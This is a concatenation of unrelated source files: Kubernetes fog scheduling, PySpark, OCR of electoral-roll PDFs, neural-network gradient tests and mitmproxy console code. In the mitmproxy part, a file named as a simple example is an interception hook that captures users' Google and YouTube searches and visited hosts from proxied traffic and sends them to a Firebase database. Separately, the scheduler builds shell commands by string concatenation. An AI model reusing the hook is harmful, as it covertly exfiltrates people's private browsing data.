reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request_default_other += sum(cpureqs)
node_memory_request_default_other += sum(memreqs)
dict = {}
dict['name'] = node_name
dict['cpu'] = float(allocatabale_cpu - node_cpu_request_all + node_cpu_request_default - node_cpu_request_default_other) * 1000
dict['memory'] = float(allocatable_memory - node_memory_request_all + node_memory_request_default - node_memory_request_default_other) / (
1024 * 1024)
allocatable_resources_per_node.append(dict)
except:
print("Connection timeout after " + str(timeout) + " seconds on cluster " + cluster)
return allocatable_resources_per_node
def compute_available_resources(cluster):
total_allocatable_cpu = 0
total_allocatable_memory = 0
available_cpu = 0
available_memory = 0
total_cpu_request = 0
total_memory_request = 0
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
available_resources_per_node = []
try:
for node in core_v1.list_node(_request_timeout=timeout).items:
stats = {}
node_name = node.metadata.name
allocatable = node.status.allocatable
allocatabale_cpu = Q_(allocatable['cpu']).to('m')
allocatable_memory = Q_(allocatable['memory'])
total_allocatable_cpu += allocatabale_cpu
total_allocatable_memory += allocatable_memory
max_pods = int(int(allocatable["pods"]) * 1.5)
field_selector = ("status.phase!=Succeeded,status.phase!=Failed," +
"spec.nodeName=" + node_name)
node_cpu_request = 0
node_memory_request = 0
pods = core_v1.list_pod_for_all_namespaces(limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request += sum(cpureqs)
node_memory_request += sum(memreqs)
dict = {}
dict['name'] = node_name
dict['cpu'] = float(allocatabale_cpu - node_cpu_request) * 1000
dict['memory'] = float(allocatable_memory - node_memory_request) / (1024 * 1024)
available_resources_per_node.append(dict)
total_cpu_request += Q_(node_cpu_request)
total_memory_request += Q_(node_memory_request).to('Ki')
available_cpu = total_allocatable_cpu - total_cpu_request
available_memory = total_allocatable_memory - total_memory_request
available_cpu = float(str(available_cpu)[:-2])
available_memory = float(str(available_memory)[:-3])
except:
print("Connection timeout after " + str(timeout) + " seconds on cluster " + cluster)
return available_cpu, available_memory, available_resources_per_node
def getPerNodeResources(cluster):
perNodeCPU = 0
perNodeMemory = 0
client_cluster = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
nodes = client_cluster.list_node(_request_timeout=timeout)
perNodeCPU = Q_(nodes.items[0].status.capacity['cpu']).to('m')
perNodeMemory = Q_(nodes.items[0].status.capacity['memory']).to('Ki')
perNodeCPU = float(str(perNodeCPU)[:-2])
perNodeMemory = float(str(perNodeMemory)[:-3])
except:
print("Connection timeout after " + str(timeout) + " seconds to " + cluster)
return perNodeCPU, perNodeMemory
def checkClusterPossibility(cluster, app_cpu_request, app_memory_request):
cluster_per_node_cpu, cluster_per_node_memory = getPerNodeResources(cluster)
if app_cpu_request >= cluster_per_node_cpu or app_memory_request*1024 >= cluster_per_node_memory:
return False
else:
return True
def get_all_federation_clusters():
config.load_kube_config()
api_instance = client.CustomObjectsApi()
group = 'core.kubefed.io' # str | The custom resource's group name
version = 'v1beta1' # str | The custom resource's version
namespace = 'kube-federation-system' # str | The custom resource's namespace
plural = 'kubefedclusters' # str | The custom resource's plural name. For TPRs this would be lowercase plural kind.
pretty = 'true'
clusters = []
try:
api_response = api_instance.list_namespaced_custom_object(group, version, namespace, plural, pretty=pretty, _request_timeout=timeout)
for item in api_response['items']:
clusters.append(item['metadata']['name'])
except:
print("Connection timeout after " + str(timeout) + " seconds to host cluster")
return clusters
def findNearestClusters(input_cluster, original_clusters):
if isinstance(input_cluster, dict):
input_cluster = input_cluster['name']
# TO DO: Specify cluster 0
config.load_kube_config()
api = client.CoreV1Api()
sorted_list = []
try:
nodes = api.list_node(pretty=True, _request_timeout=timeout)
nodes = [node for node in nodes.items if
'node-role.kubernetes.io/master' in node.metadata.labels]
# get all addresses of the master
addresses = nodes[0].status.addresses
master_ip = [i.address for i in addresses if i.type == "InternalIP"][0]
all_clusters = get_all_federation_clusters()
# Don't consider cloud cluster for latency comparison
# TO DO: Install and configure serf on cloud cluster
fog_only_clusters = []
for cluster in all_clusters:
if 'cloud' not in cluster:
fog_only_clusters.append(cluster)
candidate_clusters = list(filter(lambda x: x not in original_clusters, fog_only_clusters))
rtt_dict = {}
#sorted_list = []
for c in candidate_clusters:
command = 'serf rtt -rpc-addr=' + master_ip + ':7474 ' + c + ' ' + input_cluster
result = subprocess.getoutput(command)
# Need exception handling for the case when serf is not installed or available
if 'Error' in result:
print("There is an error connecting to serf .........................................")
result = float(result.split()[-2])
rtt_dict[c] = result
s = sorted(rtt_dict.items(), key=lambda x: x[1], reverse=False)
for k, v in s:
sorted_list.append(k)
print("Sorted list of clusters ....", sorted_list)
except:
print("Connection timeout after " + str(timeout) + " seconds to host cluster")
return sorted_list
def getFogAppLocationsByResource(clusters_qty):
available_cpu = {}
available_memory = {}
all_clusters = get_all_federation_clusters()
for cluster in all_clusters:
available_cpu[cluster], available_memory[cluster], _ = compute_available_resources(cluster)
sorted_dict = dict(sorted(available_memory.items(),
key=operator.itemgetter(1),
reverse=True))
if clusters_qty > len(all_clusters):
clusters_qty = len(all_clusters)
fogapp_locations = []
for key in sorted_dict:
fogapp_locations.append(key)
fogapp_locations = fogapp_locations[:clusters_qty]
return fogapp_locations
def getControllerMasterIP():
# TO DO: Specify cluster 0
config.load_kube_config()
#api = client.CoreV1Api(api_client=config.new_client_from_config(context="cluster0"))
api = client.CoreV1Api()
master_ip = ""
try:
nodes = api.list_node(pretty=True, _request_timeout=timeout)
nodes = [node for node in nodes.items if
'node-role.kubernetes.io/master' in node.metadata.labels]
# get all addresses of the master
addresses = nodes[0].status.addresses
master_ip = [i.address for i in addresses if i.type == "InternalIP"][0]
except:
print("Connection timeout after " + str(timeout) + " seconds to host cluster")
return master_ip
def getFogAppLocations(app_name, app_namespace, app_cpu_request, app_memory_request, replicas, clusters_qty, placement_policy, mode):
master_ip = getControllerMasterIP()
prom_host = os.getenv("PROMETHEUS_DEMO_SERVICE_SERVICE_HOST", master_ip)
prom_port = os.getenv("PROMETHEUS_DEMO_SERVICE_SERVICE_PORT", "30090")
prom_url = "http://" + prom_host + ":" + prom_port
# Creating the prometheus connect object with the required parameters
pc = PrometheusConnect(url=prom_url, disable_ssl=True)
# TO DO get all federation clusters except cloud
all_clusters = get_all_federation_clusters()
print("List of all clusters ................", all_clusters)
fog_only_clusters = []
for cluster in all_clusters:
if 'cloud' not in cluster:
fog_only_clusters.append(cluster)
print("Fog - only clusters .....", fog_only_clusters)
cluster_network_receive = {}
possible_clusters = []
for cluster in fog_only_clusters:
if checkClusterPossibility(cluster, app_cpu_request, app_memory_request) == True:
possible_clusters.append(cluster)
print("List of possible clusters ..............", possible_clusters)
eligible_clusters = []
if len(possible_clusters) == 0:
eligible_clusters = []
else:
for cluster in possible_clusters:
# if checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas) == True:
# eligible_clusters.append(cluster)
# Get eligible clusters and their maximum capacity
if mode == 'create':
maximum_replicas = getMaximumReplicas(cluster, app_cpu_request, app_memory_request)
elif mode == 'update':
maximum_replicas = getAllocatableCapacity(cluster, app_cpu_request, app_memory_request, app_name, app_namespace)
if maximum_replicas > 0:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = maximum_replicas
eligible_clusters.append(dict)
print("List of Eligible clusters ..............", eligible_clusters)
if len(eligible_clusters) == 0:
fogapp_locations = []
all_clusters = get_all_federation_clusters()
for cluster in all_clusters:
if 'cloud' in cluster:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = replicas * clusters_qty
fogapp_locations.append(dict)
return fogapp_locations
else:
sorted_eligible_clusters = []
if placement_policy == 'most_traffic' or placement_policy == 'most-traffic':
for cluster in eligible_clusters:
if mode == 'create':
query = "sum(instance:node_network_receive_bytes_excluding_lo:rate1m{cluster_name='" + cluster['name'] + "'})"
elif mode == 'update':
query = "sum(irate(container_network_receive_bytes_total{cluster_name='" + cluster['name'] + "', namespace='" + app_namespace + "', pod=~'frontend.*'}[60s]))"
# Here, we are fetching the values of a particular metric name
result = pc.custom_query(query=query)
#cluster_network_receive[cluster['name']] = float(result[0]['value'][1])
if len(result) > 0:
cluster['ntk_rcv'] = float(result[0]['value'][1])
else:
cluster['ntk_rcv'] = 0.0
# sorted_dict = dict(sorted(cluster_network_receive.items(),
# key=operator.itemgetter(1),
# reverse=True))
sorted_eligible_clusters = sorted(eligible_clusters, key = lambda i: i['ntk_rcv'], reverse=True)
elif placement_policy == 'worst_fit' or placement_policy == 'worst-fit':
sorted_eligible_clusters = sorted(eligible_clusters, key=lambda i: i['max_replicas'], reverse=True)
elif placement_policy == 'best_fit' or placement_policy == 'best-fit':
sorted_eligible_clusters = sorted(eligible_clusters, key=lambda i: i['max_replicas'])
print("List of sorted traffic and policy ....", sorted_eligible_clusters)
fogapp_locations = []
for cluster in sorted_eligible_clusters:
dict = {}
dict['name'] = cluster['name']
dict['max_replicas'] = cluster['max_replicas']
fogapp_locations.append(dict)
# for key in sorted_dict:
# fogapp_locations.append(key)
all_clusters = get_all_federation_clusters()
# if 'cloud' in all_clusters:
# fogapp_locations.append('cloud')
for cluster in all_clusters:
if 'cloud' in cluster:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = replicas
fogapp_locations.append(dict)
print("Final list of clusters which will host the app in the Default case ....", fogapp_locations)
#fogapp_locations = fogapp_locations[:clusters_qty]
return fogapp_locations
def getFogAppClusters(name, namespace):
config.load_kube_config()
api = client.CustomObjectsApi()
group = 'fogguru.eu'
version = 'v1'
namespace = namespace
plural = 'multiclusterdeployments'
current_clusters = []
original_clusters = []
api_response = api.list_namespaced_custom_object(group=group, version=version, namespace=namespace, plural=plural)
for item in api_response['items']:
if item['metadata']['name'] == name:
original_clusters = item['status']['create_fn']['fogapp_locations']
if 'update_fn' in item['status']:
current_clusters = item['status']['update_fn']['fogapp_locations']
else:
current_clusters = item['status']['create_fn']['fogapp_locations']
return current_clusters, original_clusters
def getServiceClusters(name, namespace):
config.load_kube_config()
api = client.CustomObjectsApi()
group = 'fogguru.eu'
version = 'v1'
namespace = namespace
plural = 'multiclusterservices'
current_clusters = []
original_clusters = []
api_response = api.list_namespaced_custom_object(group=group, version=version, namespace=namespace, plural=plural)
for item in api_response['items']:
if item['metadata']['name'] == name:
if item['status'] != "":
if 'create_fn' in item['status']:
original_clusters = item['status']['create_fn']['fogapp_locations']
if 'update_fn' in item['status']:
current_clusters = item['status']['update_fn']['fogapp_locations']
elif 'create_fn' in item['status']:
current_clusters = item['status']['create_fn']['fogapp_locations']
return current_clusters, original_clusters
def getCloudCluster():
all_clusters = get_all_federation_clusters()
cloud_cluster = ''
for cluster in all_clusters:
if 'cloud' in cluster:
cloud_cluster = cluster
return cloud_cluster
def createDeployment(cluster, deployment_body, namespace):
core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.create_namespaced_deployment(namespace=namespace, body=deployment_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when creating Deployment on " + cluster )
def createService(cluster, service_body, namespace):
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.create_namespaced_service(namespace=namespace, body=service_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when creating Service on " + cluster)
def deleteDeployment(cluster, deployment_name, namespace):
core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.delete_namespaced_deployment(namespace=namespace, name=deployment_name, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when deleting Deployment from " + cluster)
def deleteService(cluster, service_name, namespace):
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.delete_namespaced_service(namespace=namespace, name=service_name, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when deleting Service from " + cluster)
def patchDeployment(cluster, deployment_name, deployment_body, namespace):
core_v1 = client.AppsV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.patch_namespaced_deployment(namespace=namespace, name=deployment_name, body=deployment_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when patching Deployment on " + cluster)
def patchService(cluster, service_name, service_body, namespace):
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.patch_namespaced_service(namespace=namespace, name=service_name, body=service_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when patching Service on " + cluster)
def createJob(cluster, job_body, namespace):
core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.create_namespaced_job(namespace=namespace, body=job_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when creating Job on " + cluster)
def patchJob(cluster, fogapp_name, job_body, namespace):
core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.patch_namespaced_job(namespace=namespace, name=fogapp_name, body=job_body, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when patching Job on " + cluster)
def deleteJob(cluster, fogapp_name, namespace):
core_v1 = client.BatchV1Api(api_client=config.new_client_from_config(context=cluster))
try:
core_v1.delete_namespaced_job(namespace=namespace, name=fogapp_name, _request_timeout=timeout)
except:
print("Connection timeout after " + str(timeout) + " seconds when deleting Job from " + cluster)
``` |
{
"source": "00anupam00/comparative-analysis",
"score": 3
} |
#### File: src/binary/PrePocessor.py
```python
from pyspark.sql import dataframe
from src.utils.Utils import generate_id
def attach_labels(df_data_id, df_labels):
# JOIN
df = df_data_id.join(df_labels, on=["id"], how="inner")
return df
def pre_process_data(df_data: dataframe, df_labels: dataframe):
df_data_id = generate_id(df_data)
df = attach_labels(df_data_id, df_labels)
return df
```
#### File: src/multiclass/Evaluators.py
```python
from pyspark.ml.evaluation import MulticlassClassificationEvaluator
from pyspark.sql import dataframe
def evaluate_multiclass(df: dataframe.DataFrame):
# Select (prediction, true label) and compute test error
evaluator = MulticlassClassificationEvaluator(labelCol="label", predictionCol="prediction")
accuracy = evaluator.evaluate(df, {evaluator.metricName: "accuracy"})
weightedPrecision = evaluator.evaluate(df, {evaluator.metricName: "weightedPrecision"})
weightedFMeasure = evaluator.evaluate(df, {evaluator.metricName: "weightedFMeasure"})
# fMeasureByLabel = evaluator.evaluate(df, {evaluator.metricName: "fMeasureByLabel"})
weightedRecall = evaluator.evaluate(df, {evaluator.metricName: "weightedRecall"})
weightedFalsePositiveRate = evaluator.evaluate(df, {evaluator.metricName: "weightedFalsePositiveRate"})
weightedTruePositiveRate = evaluator.evaluate(df, {evaluator.metricName: "weightedTruePositiveRate"})
print("Test Error = %g \nAccuracy: %s \nFPR: %s\nTPR: %s\nF-measure: %s\nPrecision: %s\nRecall: %s"
% ((1.0 - accuracy), accuracy*100, weightedFalsePositiveRate, weightedTruePositiveRate, weightedFMeasure, weightedPrecision, weightedRecall))
```
#### File: src/multiclass/MulticlassDataLoader.py
```python
from pyspark.sql.functions import regexp_replace, when, lit
from pyspark.sql.types import StructType, StructField, LongType, IntegerType, StringType
from src.SparkConfig import get_spark_session
from src.binary.PrePocessor import pre_process_data
spark = get_spark_session("comparative-analysis")
def load_data(data_path, labels_path, multiclass_param):
df_data = spark.read.load(
data_path,
format="csv", sep=",", inferSchema="true", header="false")
print("Loaded dataset. ")
labels_schema = StructType([StructField("id", LongType(), False),
StructField("label", IntegerType(), False)])
df_labels = spark.read.load(
labels_path,
format="csv",
sep=",",
inferSchema="false",
schema=labels_schema,
mode="DROPMALFORMED",
header="true")
df_labels = df_labels.withColumn('label', when(df_labels.label == 1, lit(multiclass_param)).otherwise(lit(0)))
print("Loaded labels. ")
df_labels.select("id", "label").orderBy('id', ascending=False).show()
# Pass through data pre-processor
df = pre_process_data(df_data, df_labels)
return df
def show(df):
df.describe().show(25)
print("The last 10 lines of the dataset: ")
print(df.tail(10))
```
#### File: comparative-analysis/src/SparkConfig.py
```python
from pyspark.sql import SparkSession
def get_spark_session(appName):
return SparkSession.builder.appName(appName).getOrCreate()
``` |
{
"source": "00archer0/Dataminig",
"score": 3
} |
#### File: 00archer0/Dataminig/mix.py
```python
import pandas as pd
import re
import urllib
import requests
from urllib.request import urlretrieve
from wand.image import Image
import io
import os
import six
from google.cloud import vision
from google.cloud import translate
from google.cloud.vision import types
import json
client = vision.ImageAnnotatorClient()
target = 'en'
final = ''
counter = []
station = pd.read_excel('polling_station.xlsx')
link = 'http://ceoharyana.nic.in/docs/election/finalroll2018/'
link_part = 'CMB02/CMB0020022.PDF'
url = link+link_part
item = [(3400,300,3800,500),(450,1970,2480,3850),(870,4070,2700,4300),(870,4330,2700,4500),
(3100,2900,3800,3050),(3120,3780,3800,3860),(1300,4980,2000,5250)]
def get_pic(sample_pdf,area):
img = sample_pdf.clone()
img.crop(*area)
return img.make_blob('JPEG')
for x in range(1,21):
num = re.findall(r'\d+',station.AC[x])
first_part = 'CMB' + num[0]
print('here')
final = ''
for p in range(1, station['polling_station'][x] + 1):
print(str(p) +' next here')
sec_part = 'CMB'+ str(num[0]).zfill(3) + str(p).zfill(4)
path = first_part + '_' + sec_part +'.pdf'
url = link + first_part + '/' + sec_part +'.PDF'
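# Worked example (matches the sample link_part above): for an AC whose
# number is "02" and polling station p=22, num[0] is "02", so
# sec_part = 'CMB' + '002' + '0022' = 'CMB0020022',
# path = 'CMB02_CMB0020022.pdf' and url ends in 'CMB02/CMB0020022.PDF'.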
fetched_item = ''
sample_pdf = Image(filename=path+"[0]", resolution=500)
for t in item:
print(t)
content = get_pic(sample_pdf,t)
image = types.Image(content= content)
image_context = vision.types.ImageContext(language_hints=['hi'])
response = client.document_text_detection(image=image)
texts = response.text_annotations
texts = texts[0].description.replace('\n',' ')
fetched_item = fetched_item+texts+' ~ '
print(fetched_item)
final = final+fetched_item+'\n'
'''final.append(str(fetched_item))
print(final)
to_save = pd.DataFrame(final)
to_save.to_csv('fin.csv',index=False,encoding='utf-8',header=False)
'''
with open(station['AC'][x]+'.txt','w+',encoding='utf-8') as file:
file.write(final)
print(counter.count(1))
print('here')
``` |
{
"source": "00arun00/SimFlow",
"score": 4
} |
#### File: simflow/utils/grad_check_utils.py
```python
import numpy as np
def numerical_gradient_array(f, x, df, h=1e-5):
"""
Evaluate a numeric gradient for a function that accepts a numpy
array and returns a numpy array.
Args:
f (function): function that is passed to compute gradient for
x (numpy.ndarray): input to function
df (numpy.ndarray): output gradient
h (float): delta around which gradient is calculated
Returns:
grad (numpy.ndarray): computed numeric gradient
"""
grad = np.zeros_like(x)
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
oldval = x[ix]
x[ix] = oldval + h
pos = f(x).copy()
x[ix] = oldval - h
neg = f(x).copy()
x[ix] = oldval
grad[ix] = np.sum((pos - neg) * df) / (2 * h)
it.iternext()
return grad
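# A minimal usage sketch (hypothetical function, not part of the test suite):
#
# x = np.random.randn(4, 3)
# dout = np.random.randn(4, 3)
# f = lambda a: a ** 2  # elementwise square
# dx_num = numerical_gradient_array(f, x, dout)  # approximately 2 * x * dout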
```
#### File: SimFlow/tests/test_conv.py
```python
import numpy as np
from simflow.layers.convolutional import Conv2D
from simflow.utils.grad_check_utils import numerical_gradient_array
from simflow.utils.im2col import im2col_indices
from unittest import TestCase
class TestConv(TestCase):
@staticmethod
def standard_forward(X, w, b, padding, stride):
n_x, d_x, h_x, w_x = X.shape
n_filters, d_filter, h_filter, w_filter = w.shape
h_out = (h_x - h_filter + 2 * padding) // stride + 1
w_out = (w_x - w_filter + 2 * padding) // stride + 1
X_col = im2col_indices(X, h_filter, w_filter,
padding=padding, stride=stride)
W_col = w.reshape(n_filters, -1)
out = W_col @ X_col + b
out = out.reshape(n_filters, h_out, w_out, n_x)
out = out.transpose(3, 0, 1, 2)
return out
def test_conv_layer_forward_prop(self):
eps = 1e-8
batch_size = 32
filter_size = 3
h_x, w_x = 7, 7
inChannels = 3
n_filter = 5
padding = 1
stride = 1
x = np.random.randn(batch_size, inChannels, h_x, w_x)
w = np.random.randn(n_filter, inChannels, filter_size, filter_size)
b = np.random.randn(n_filter, 1)
c_layer = Conv2D(inChannels=inChannels, outChannels=n_filter,
filter_size=filter_size, stride=stride,
padding=padding, trainable=True)
c_layer.W = w
c_layer.b = b
out = c_layer.forward(x)
out_standard = self.standard_forward(x, w, b, padding, stride)
assert np.allclose(out, out_standard, atol=eps)
def test_conv_layer_back_prop(self):
eps = 1e-7
batch_size = 32
filter_size = 3
h_x, w_x = 7, 7
inChannels = 3
n_filter = 5
padding = 1
stride = 1
h_out = (h_x - filter_size + 2*padding)//stride + 1
w_out = (w_x - filter_size + 2*padding)//stride + 1
x = np.random.randn(batch_size, inChannels, h_x, w_x)
w = np.random.randn(n_filter, inChannels, filter_size, filter_size)
b = np.random.randn(n_filter, 1)
dout = np.random.randn(batch_size, n_filter, h_out, w_out)
c_layer = Conv2D(inChannels=inChannels, outChannels=n_filter,
filter_size=filter_size, stride=stride,
padding=padding, trainable=True)
c_layer.W = w
c_layer.b = b
dx_num = numerical_gradient_array(c_layer.forward, x, dout, h=eps)
dw_num = numerical_gradient_array(lambda w: c_layer.forward(x),
w, dout, h=eps)
db_num = numerical_gradient_array(lambda b: c_layer.forward(x),
b, dout, h=eps)
dx, grads = c_layer.backward(dout)
dw, db = grads[0][1], grads[1][1]
assert np.allclose(dx, dx_num, atol=eps)
assert np.allclose(dw, dw_num, atol=eps)
assert np.allclose(db, db_num, atol=eps)
```
#### File: SimFlow/tests/test_dilated_conv.py
```python
import numpy as np
from simflow.layers.convolutional import dilated_Conv2D
from simflow.utils.grad_check_utils import numerical_gradient_array
import unittest
class TestDilatedConv(unittest.TestCase):
def test_dilated_conv_layer_back_prop(self):
eps = 1e-7
batch_size = 32
filter_size = 3
h_x, w_x = 7, 7
inChannels = 3
n_filter = 5
padding = 0
stride = 1
dilation = 2
new_filter_size = dilation*(filter_size-1)+1
h_out = (h_x - new_filter_size + 2*padding)//stride + 1
w_out = (w_x - new_filter_size + 2*padding)//stride + 1
x = np.random.randn(batch_size, inChannels, h_x, w_x)
w = np.random.randn(n_filter, inChannels, filter_size, filter_size)
b = np.random.randn(n_filter, 1)
dout = np.random.randn(batch_size, n_filter, h_out, w_out)
dc_layer = dilated_Conv2D(inChannels=inChannels, outChannels=n_filter,
filter_size=filter_size, stride=stride,
padding=padding, trainable=True)
dc_layer.W = w
dc_layer.b = b
dx_num = numerical_gradient_array(dc_layer.forward,
x, dout, h=eps)
dw_num = numerical_gradient_array(lambda w: dc_layer.forward(x),
w, dout, h=eps)
db_num = numerical_gradient_array(lambda b: dc_layer.forward(x),
b, dout, h=eps)
dx, grads = dc_layer.backward(dout)
dw, db = grads[0][1], grads[1][1]
assert np.allclose(dx, dx_num, atol=eps)
assert np.allclose(dw, dw_num, atol=eps)
assert np.allclose(db, db_num, atol=eps)
``` |
{
"source": "00cool/mitmmyversion",
"score": 2
} |
#### File: 00cool/mitmmyversion/connect.py
```python
import pyrebase
config = {
"apiKey": "<KEY>",
"authDomain": "student-data-jump.firebaseapp.com",
"databaseURL": "https://student-data-jump.firebaseio.com",
"storageBucket": "student-data-jump.appspot.com",
"serviceAccount": "/home/nick/Desktop/firebase/student-data-jump-firebase-adminsdk-zzb0l-cfaf56906d.json"
}
firebase = pyrebase.initialize_app(config)
auth = firebase.auth()
user = auth.sign_in_with_email_and_password("<EMAIL>","<PASSWORD>")
user = auth.refresh(user['refreshToken'])
user['idToken']
db = firebase.database()
def sendDataToFire(data, sendTo):
db.child(sendTo).push(data)
```
#### File: examples/simple/modify_querystring.py
```python
from mitmproxy import http
import re
import json
import sys
sys.path.append('../')
from connect import sendDataToFire
def request(flow: http.HTTPFlow) -> None:
data = {}
#data['time'] = flow.request.timestamp_start
######################################################################
if flow.request.url[:32] == "https://www.google.co.in/search?" and flow.request.method == 'GET' :
#data['From'] = "Google search"
s = flow.request.path
s = s[s.find('q=')+2:]
s = s[:s.find('&')]
data['QueryG'] = s.replace('+', ' ')
json_dg = json.dumps(data)
sendDataToFire(json_dg, 'Google')#[data.find('&q=')+1: data.find('&')])
########################################################################
elif (flow.request.url[:50] == "https://suggestqueries.google.com/complete/search?" and flow.request.method == 'GET'):
ys = flow.request.path
ys = ys[ys.find('q=')+2:]
ys = ys[:ys.find('&')]
data['QueryY'] = ys.replace('+', ' ')
json_dy = json.dumps(data)
sendDataToFire(json_dy, 'YouTube')#[data.find('&q=')+1: data.find('&')])
######################################################################
else:
if flow.request.method == 'GET':
data['Website'] = flow.request.host
json_dw = json.dumps(data)
sendDataToFire(json_dw, 'Visited-websites')
# data['url'] = flow.request.url
# json_data = json.dumps(data)
# sendDataToFire(json_data, 'Visited-websites')
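# Worked example of the query extraction above (illustrative path):
# path = "/search?q=hello+world&num=20"
# after s[s.find('q=')+2:] -> "hello+world&num=20"
# after s[:s.find('&')]    -> "hello+world"
# after .replace('+', ' ') -> "hello world", which is what gets pushed.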
```
#### File: tools/console/window.py
```python
import re
import urwid
from mitmproxy.tools.console import common
from mitmproxy.tools.console import signals
from mitmproxy.tools.console import statusbar
from mitmproxy.tools.console import flowlist
from mitmproxy.tools.console import flowview
from mitmproxy.tools.console import commands
from mitmproxy.tools.console import keybindings
from mitmproxy.tools.console import options
from mitmproxy.tools.console import overlay
from mitmproxy.tools.console import help
from mitmproxy.tools.console import grideditor
from mitmproxy.tools.console import eventlog
class StackWidget(urwid.Frame):
def __init__(self, window, widget, title, focus):
self.is_focused = focus
self.window = window
if title:
header = urwid.AttrWrap(
urwid.Text(title),
"heading" if focus else "heading_inactive"
)
else:
header = None
super().__init__(
widget,
header=header
)
def mouse_event(self, size, event, button, col, row, focus):
if event == "mouse press" and button == 1 and not self.is_focused:
self.window.switch()
return super().mouse_event(size, event, button, col, row, focus)
def keypress(self, size, key):
# Make sure that we don't propagate cursor events outside of the widget.
# Otherwise, in a horizontal layout, urwid's Pile would change the focused widget
# if we cannot scroll any further.
ret = super().keypress(size, key)
command = self._command_map[ret] # awkward as they don't implement a full dict api
if command and command.startswith("cursor"):
return None
return ret
class WindowStack:
def __init__(self, master, base):
self.master = master
self.windows = dict(
flowlist = flowlist.FlowListBox(master),
flowview = flowview.FlowView(master),
commands = commands.Commands(master),
keybindings = keybindings.KeyBindings(master),
options = options.Options(master),
help = help.HelpView(master),
eventlog = eventlog.EventLog(master),
edit_focus_query = grideditor.QueryEditor(master),
edit_focus_cookies = grideditor.CookieEditor(master),
edit_focus_setcookies = grideditor.SetCookieEditor(master),
edit_focus_form = grideditor.RequestFormEditor(master),
edit_focus_path = grideditor.PathEditor(master),
edit_focus_request_headers = grideditor.RequestHeaderEditor(master),
edit_focus_response_headers = grideditor.ResponseHeaderEditor(master),
)
self.stack = [base]
self.overlay = None
def set_overlay(self, o, **kwargs):
self.overlay = overlay.SimpleOverlay(
self, o, self.top_widget(), o.width, **kwargs,
)
def top_window(self):
"""
The current top window, ignoring overlays.
"""
return self.windows[self.stack[-1]]
def top_widget(self):
"""
The current top widget - either a window or the active overlay.
"""
if self.overlay:
return self.overlay
return self.top_window()
def push(self, wname):
if self.stack[-1] == wname:
return
prev = self.top_window()
self.stack.append(wname)
self.call("layout_pushed", prev)
def pop(self, *args, **kwargs):
"""
Pop off the stack, return True if we're already at the top.
"""
if not self.overlay and len(self.stack) == 1:
return True
self.call("layout_popping")
if self.overlay:
self.overlay = None
else:
self.stack.pop()
def call(self, name, *args, **kwargs):
"""
Call a function on both the top window, and the overlay if there is
one. If the widget has a key_responder, we call the function on the
responder instead.
"""
getattr(self.top_window(), name)(*args, **kwargs)
if self.overlay:
getattr(self.overlay, name)(*args, **kwargs)
class Window(urwid.Frame):
def __init__(self, master):
self.statusbar = statusbar.StatusBar(master)
super().__init__(
None,
header = None,
footer = urwid.AttrWrap(self.statusbar, "background")
)
self.master = master
self.master.view.sig_view_refresh.connect(self.view_changed)
self.master.view.sig_view_add.connect(self.view_changed)
self.master.view.sig_view_remove.connect(self.view_changed)
self.master.view.sig_view_update.connect(self.view_changed)
self.master.view.focus.sig_change.connect(self.view_changed)
self.master.view.focus.sig_change.connect(self.focus_changed)
signals.focus.connect(self.sig_focus)
signals.flow_change.connect(self.flow_changed)
signals.pop_view_state.connect(self.pop)
signals.push_view_state.connect(self.push)
self.master.options.subscribe(self.configure, ["console_layout"])
self.master.options.subscribe(self.configure, ["console_layout_headers"])
self.pane = 0
self.stacks = [
WindowStack(master, "flowlist"),
WindowStack(master, "eventlog")
]
def focus_stack(self):
return self.stacks[self.pane]
def configure(self, options, updated):
self.refresh()
def refresh(self):
"""
Redraw the layout.
"""
c = self.master.options.console_layout
if c == "single":
self.pane = 0
def wrapped(idx):
widget = self.stacks[idx].top_widget()
if self.master.options.console_layout_headers:
title = self.stacks[idx].top_window().title
else:
title = None
return StackWidget(
self,
widget,
title,
self.pane == idx
)
w = None
if c == "single":
w = wrapped(0)
elif c == "vertical":
w = urwid.Pile(
[
wrapped(i) for i, s in enumerate(self.stacks)
],
focus_item=self.pane
)
else:
w = urwid.Columns(
[wrapped(i) for i, s in enumerate(self.stacks)],
dividechars=1,
focus_column=self.pane
)
self.body = urwid.AttrWrap(w, "background")
def flow_changed(self, sender, flow):
if self.master.view.focus.flow:
if flow.id == self.master.view.focus.flow.id:
self.focus_changed()
def focus_changed(self, *args, **kwargs):
"""
Triggered when the focus changes - either when it's modified, or
when it changes to a different flow altogether.
"""
for i in self.stacks:
i.call("focus_changed")
